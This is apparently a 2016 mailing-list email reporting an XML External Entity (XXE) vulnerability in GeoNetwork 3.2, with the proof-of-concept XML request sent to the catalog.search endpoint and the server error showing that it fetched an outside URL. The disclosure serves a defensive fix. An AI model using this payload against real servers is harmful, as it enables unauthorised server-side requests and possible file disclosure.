From: Mariano V. <mva...@co...> - 2016-12-28 17:50:26
|
Hi, My name es Mariano Valderrey, and I have scanned my GeoNetwork with Accunetix and found XML External Entity Injection vulnerability. I found that en GeoServer you have fixed the problem and maybe I can use the solution for GeoNetwork 3.2. I wonder if you can help me with this. Here is what I found: https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing ************** To confirm this I send a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE request [ <!ENTITY include SYSTEM "http://google.com"> ]> <catalog.search>&include;</catalog.search> And I received this result: <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Error 400 Cannot build ServiceRequest Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup. Error : org.jdom.input.JDOMParseException </title> </head> <body><h2>HTTP ERROR 400</h2> <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason: <pre> Cannot build ServiceRequest Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup. Error : org.jdom.input.JDOMParseException </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.3.11.v20160721</a><hr/> </body> </html> ****************** The package capture from the server I can see that send a request to http://google.com and I found in the result that the server was redirected to www.google.com.ar. This confirm the vulnerability. Sorry for my english, Greetings and thank you so much. -- Ing. en Sistemas Mariano Valderrey Tel. (+54 11) 4331 0074 int. 5727 Unidad Base de Datos y Comunicaciones Gerencia de Gestión Tecnológica CONAE |